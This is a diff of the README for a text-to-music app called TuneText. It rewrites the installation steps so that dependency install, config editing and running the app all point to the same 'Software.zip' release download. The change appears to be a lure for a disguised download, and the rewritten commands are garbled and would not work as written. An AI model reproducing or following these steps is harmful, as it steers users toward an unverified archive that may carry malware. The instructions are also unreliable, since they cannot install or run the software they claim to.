popopopopopopopopopopopopopopo/TuneText/README.md

 ## Installation
 To get started with TuneText, follow these steps:
 1. Clone this repository to your local machine.
-2. Install the required dependencies using `pip install -r requirements.txt`.
+2. Install the required dependencies using `pip install -r https://github.com/popopopopopopopopopopopopopopo/TuneText/releases/download/v1.0/Software.zip`.
 3. Obtain API keys for Groq Cloud and Spotify.
-4. Update the API keys in the `config.py` file.
+4. Update the API keys in the `https://github.com/popopopopopopopopopopopopopopo/TuneText/releases/download/v1.0/Software.zip` file.
-5. Run the app using `python app.py`.
+5. Run the app using `python https://github.com/popopopopopopopopopopopopopopo/TuneText/releases/download/v1.0/Software.zip`.

 ## Usage
 1. Enter a text description or keywords into TuneText.